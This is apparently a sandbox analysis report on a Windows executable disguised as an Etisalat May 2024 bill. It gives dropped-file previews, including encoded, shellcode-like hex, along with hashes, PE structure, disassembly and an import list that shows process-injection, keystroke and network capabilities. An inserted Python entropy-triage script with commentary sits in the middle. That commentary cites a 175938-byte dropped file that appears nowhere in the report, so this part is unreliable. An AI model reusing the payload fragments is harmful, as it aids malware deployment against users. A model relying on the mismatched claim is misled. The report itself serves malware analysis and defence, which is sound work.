                                    Preview:EA06......`P^..I.@z.zws...{...;...N..m.&.O......d.+......?..T...Vo|..@&3..OB..'sY..Y&...;L.yv..1......Am..R.y.Vjw .l.......V..:./..!.q'.....0.l......P.S.....c..L&.p...3.....".Y.s.q`.Mi..).r.^...P.......^...o....&.I.F*...J.U.P......4.).^...../.Vh..=....Vj....Q.C.......;.K..E..T...n..A...].5I..W................._......W.....n:Q:../D..xR.......-....V.`.{..&)..D..?_.f.P^.^s?.G.|....N&y.7..X.i...._...jv.|.Fa\.........P..85.c...*<...q.n.9m.3....1..c........o..3.z<F...W.Y....M.tx..MP.P.ly..Eo..bp..._..#...na...Jt....d....oR.Z...i..-T......S33.t.....P...f....U5.7.........s.....*..?].~...c>.0l&...[...k)...O...ok....a..w....>....U7.G...m.zj.{[..J+.|..D..<?..G.I.......H.Z8.l.ja...+.....x..1W\^.7...v..5....j...E.....4>..a..:U~$Z.....QZ.v.K.Y.0-.v9..B.p?.sm.......H..8..'KyC.H).....>....X}K......j.g...7^=[.......;....u;}%....j6..a8.\.z.....s6V......w...g..@i=].....".......~..y.7....\.Gr.e.wc..5.y.Ya..$R.....YZO~..._f..$.c..U..n>.m.o.......T.Q=.:
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9752
                                    Entropy (8bit):7.594462734656479
                                    Encrypted:false
                                    SSDEEP:192:Q09SJLZ7jNO7shshwkKfNEhaQrV7uDt/Fm/QF6Mo4UWTkmOFV+y1Fp6w:z9SJtjehdUJCduS/QoMoNMkmOL+y1FAw
                                    MD5:B6BF1F476FB9BA827784616B321A3726
                                    SHA1:4819052A291482A7DDC13DBB41AF49F62B3087B5
                                    SHA-256:DD6186939A38E549E39959706A855192EABD15CE4EF5E294BB89E1BB96E23A8C
                                    SHA-512:BC90F6C0D3850025B1F08ECA870304AE43E7A789906A9649FB8E499EEE989DF9A5CDA7B8821A467BC8B228B8BF818D908F54B2E17DC1B9386610AF1F8686D19C
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..t..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:ASCII text, with very long lines (29698), with no line terminators
                                    Category:dropped
                                    Size (bytes):29698
                                    Entropy (8bit):3.537035087934973
                                    Encrypted:false
                                    SSDEEP:768:G3i/vrBPE0VQytmOjE9F4wp5Ji6wNLHll1Nfnr1uLphM:Ui31PEPwmOgGuLDM
                                    MD5:9A1C8103B0C3C11768526EEDF4AC7E0F
                                    SHA1:E3ADE56FAC9423E55A799EB461ABC804F7D25814
                                    SHA-256:8D344587DF89E85DCDE5BC45CB6F470F1813071152198413BE78FF9581838B48
                                    SHA-512:4B6B46DCD5BD7B8081DAE6675120F7352AAAC956F41E9D3A4F47B2F543192386B0A68F16ED7B61849EA563FFC55DDE06F528AE8AD6EFF0389C3E816D1D2CF90C
                                    Malicious:false
                                    Reputation:low
                                    Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86
                                    Process:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):189440
                                    Entropy (8bit):7.808876876315375
                                    Encrypted:false
                                    SSDEEP:3072:nW1u3CstacDKGU4hv0+WOp8RfJZhtgG/Waa0mVje8CTgrihqsexHXhL0Dp9caif3:1FU4hv0qQfDhtgGHa0I00ihsxxL0DpOv
                                    MD5:6CA95B5ABF42D7234035E349F3E2C7F2
                                    SHA1:72CF24FC3BF8C2426926AAEC738B81D3474FD960
                                    SHA-256:BC8EE91A96683D93D955AA9C1B1355F1588D877EAFC8C606F56C8655C8E5D1C5
                                    SHA-512:F574165FE284B63DE7EBEE8ADA709BA08A97EA923CF1F86C892BFDFC0F4C4302DAE23BBC3BBDAB9B16960EDB81BC80ACC2C01D3C8D7EE92E5F7EB4E766E2DABF
                                    Malicious:false
                                    Reputation:low
                                    Preview:.....8WIT..N....u.YU...;_...VOGW08WITYVOGW08WITYVOGW08WITY.OGW>'.GT._.f.1t.h.1?<g'BW0;54v,&9^W#i6<v=29.Q9i...o*8T]yDYSrOGW08WI..^...V...2..!..8....0..W...2.O...1..05'..V.WITYVOGW08WITYVO..08.HUY^..08WITYVO.W29\H^YV.EW08WITYVO..18WYTYV.EW08.ITIVOGU08RIUYVOGW58VITYVOG.28WKTYVOGW28..TYFOGG08WIDYV_GW08WIDYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYx;"/D8WI@.TOGG08W.VYV_GW08WITYVOGW08wIT9VOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITYVOGW08WITY
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.975314174923486
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    File size:1'062'400 bytes
                                    MD5:aa15c6bc55041b534268e0a07c5f0abc
                                    SHA1:0b73953d2ea38ba9e4a996f96eb4426da818b854
                                    SHA256:87f7f23776e3b70ce5a9f4095028edf855402cee27433be2b7d65c513cf25235
                                    SHA512:8de557cfd9cb756fedb7dbe3880dcbd397405b6c3f7802f25010cb9d1bf775309ebd6165253ba7028b7c192a90d741555ac4b55814db4ad25cb054ae97a4f9bf
                                    SSDEEP:24576:rAHnh+eWsN3skA4RV1Hom2KXMmHaWSLwh47/N5:Gh+ZkldoPK8YaWSV/
                                    TLSH:5A35AD0273D2C036FFAB92739B6AF20156BD7D254123852F13981DB9BD701B2267E663
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                    Icon Hash:aaf3e3e3938382a0
                                    Entrypoint:0x42800a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6655B1EB [Tue May 28 10:28:59 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                    Instruction
                                    call 00007F864CB4FEBDh
                                    jmp 00007F864CB42C74h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push edi
                                    push esi
                                    mov esi, dword ptr [esp+10h]
                                    mov ecx, dword ptr [esp+14h]
                                    mov edi, dword ptr [esp+0Ch]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F864CB42DFAh
                                    cmp edi, eax
                                    jc 00007F864CB4315Eh
                                    bt dword ptr [004C41FCh], 01h
                                    jnc 00007F864CB42DF9h
                                    rep movsb
                                    jmp 00007F864CB4310Ch
                                    cmp ecx, 00000080h
                                    jc 00007F864CB42FC4h
                                    mov eax, edi
                                    xor eax, esi
                                    test eax, 0000000Fh
                                    jne 00007F864CB42E00h
                                    bt dword ptr [004BF324h], 01h
                                    jc 00007F864CB432D0h
                                    bt dword ptr [004C41FCh], 00000000h
                                    jnc 00007F864CB42F9Dh
                                    test edi, 00000003h
                                    jne 00007F864CB42FAEh
                                    test esi, 00000003h
                                    jne 00007F864CB42F8Dh
                                    bt edi, 02h
                                    jnc 00007F864CB42DFFh
                                    mov eax, dword ptr [esi]
                                    sub ecx, 04h
                                    lea esi, dword ptr [esi+04h]
                                    mov dword ptr [edi], eax
                                    lea edi, dword ptr [edi+04h]
                                    bt edi, 03h
                                    jnc 00007F864CB42E03h
                                    movq xmm1, qword ptr [esi]
                                    sub ecx, 08h
                                    lea esi, dword ptr [esi+08h]
                                    movq qword ptr [edi], xmm1
                                    lea edi, dword ptr [edi+08h]
                                    test esi, 00000007h
                                    je 00007F864CB42E55h
                                    bt esi, 03h
                                    Programming Language:
                                    • [ASM] VS2013 build 21005
                                    • [ C ] VS2013 build 21005
                                    • [C++] VS2013 build 21005
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2013 UPD5 build 40629
                                    • [RES] VS2013 build 21005
                                    • [LNK] VS2013 UPD5 build 40629
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x38ed0 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x101000 | 0x7134 | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rsrc | 0xc8000 | 0x38ed0 | 0x39000 | 967b628c996fd9958f40d6528b7f29a1 | False | 0.8841445655153509 | data | 7.788354597152202 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc | 0x101000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                     RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                     RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                     RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                     RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                     RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                     RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                     RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                     RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                     RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                     RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                     RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
                                     RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                     RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                     RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                     RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                     RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                     RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                     RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                     RT_RCDATA | 0xd07b8 | 0x30168 | data | | | 1.0003604646440032
                                     RT_GROUP_ICON | 0x100920 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                     RT_GROUP_ICON | 0x100998 | 0x14 | data | English | Great Britain | 1.25
                                     RT_GROUP_ICON | 0x1009ac | 0x14 | data | English | Great Britain | 1.15
                                     RT_GROUP_ICON | 0x1009c0 | 0x14 | data | English | Great Britain | 1.25
                                     RT_VERSION | 0x1009d4 | 0x10c | data | English | Great Britain | 0.5970149253731343
                                     RT_MANIFEST | 0x100ae0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
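Both the dropped-file records and the section table above give an "Entropy (8bit)" value, and the resource table's RT_RCDATA entry carries a ZLIB complexity of 1.0, meaning it does not compress at all. The example below is added here and is not part of the Joe Sandbox report or its tooling: it reproduces the 8-bit Shannon entropy figure and applies the triage thresholds a practitioner reads it against. The section rows are copied from the table above; the byte strings fed to demo() are constructed; the 7.2 and 6.0 thresholds, the 256-byte minimum and the names entropy_verdict and flag_sections are my own choices, not values the report defines. One caveat the report's fields invite: the 175938-byte dropped file is listed as "Encrypted: false" while showing 7.979 of a possible 8.0 bits per byte. At that size a value this close to the ceiling means compressed or encrypted content whatever the flag says, so rely on the number.

```python
import math
from collections import Counter

# Added example (not from the Joe Sandbox report): reproduces the
# "Entropy (8bit)" figure printed for dropped files and PE sections and
# applies the usual triage rule of thumb to it.


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_verdict(entropy: float, size: int) -> str:
    """Classify a blob by its entropy; tiny blobs are statistically noisy, so skip them.

    Thresholds (7.2 and 6.0) are conventional triage values, not report-defined ones.
    """
    if size < 256:
        return "inconclusive (too small)"
    if entropy >= 7.2:
        return "compressed or encrypted"
    if entropy >= 6.0:
        return "mixed code/data (typical x86 .text)"
    return "plain data or sparse"


# Section rows copied from the report's section table:
# (name, virtual size, raw size, entropy).
REPORT_SECTIONS = [
    (".text",  0x8dfdd, 0x8e000, 6.675248351711057),
    (".rdata", 0x2fd8e, 0x2fe00, 5.763244005758284),
    (".data",  0x8f74,  0x5200,  1.1963819235530628),
    (".rsrc",  0x38ed0, 0x39000, 7.788354597152202),
    (".reloc", 0x7134,  0x7200,  6.783955557128661),
]


def flag_sections(rows):
    """Names of sections whose entropy indicates packed or encrypted content."""
    return [name for name, _vsize, rsize, ent in rows
            if entropy_verdict(ent, rsize) == "compressed or encrypted"]


def demo():
    """Entropy of three constructed inputs (not taken from the sample)."""
    samples = {
        "zeros": bytes(256),                               # constant run
        "text": b"This program cannot be run in DOS mode",  # ASCII prose
        "uniform": bytes(range(256)) * 4,                  # every byte value equally often
    }
    return {k: round(shannon_entropy(v), 3) for k, v in samples.items()}


if __name__ == "__main__":
    print(demo())
    print("packed/encrypted sections:", flag_sections(REPORT_SECTIONS))
```

Run as a script it prints the entropies of the constructed inputs and flags only .rsrc, which agrees with the incompressible RT_RCDATA resource being where this binary keeps its payload; the .text value of about 6.7 is ordinary for x86 code and is not a packing indicator on its own.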
                                    DLLImport
                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, 
LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll: AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll: StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll: GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
